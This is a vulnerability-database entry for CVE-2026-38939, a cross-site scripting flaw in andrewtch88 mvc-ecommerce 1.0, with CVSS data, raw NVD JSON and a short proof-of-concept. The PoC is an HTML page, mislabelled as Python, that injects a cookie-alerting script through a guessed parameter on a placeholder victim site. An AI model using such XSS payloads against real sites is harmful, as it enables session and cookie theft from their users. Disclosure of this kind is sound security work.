Security Vulnerability Report
中文
CVE-2026-38939 CVSS 6.1 MEDIUM

CVE-2026-38939

Published: 2026-04-30 16:16:43
Last Modified: 2026-04-30 18:16:30

Description

Cross Site Scripting vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the product_catalogue.php component

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

andrewtch88 mvc-ecommerce 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- // PoC for CVE-2026-38939 // Vulnerable File: product_catalogue.php --> <html> <body> <script> // Generate malicious payload var payload = '<script>alert(document.cookie)<\/script>'; // Example URL construction (parameter name may vary based on actual code) var target = 'http://victim-site/product_catalogue.php?product=' + encodeURIComponent(payload); // Redirect or simulate click window.location.href = target; </script> <p>CVE-2026-38939 XSS PoC - Check console or alert</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38939", "sourceIdentifier": "[email protected]", "published": "2026-04-30T16:16:43.417", "lastModified": "2026-04-30T18:16:30.117", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in andrewtch88 mvc-ecommerce v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the product_catalogue.php component"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8", "source": "[email protected]"}, {"url": "https://gist.github.com/spico8/3b8b64a58069fc189ca28563dd1249e8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}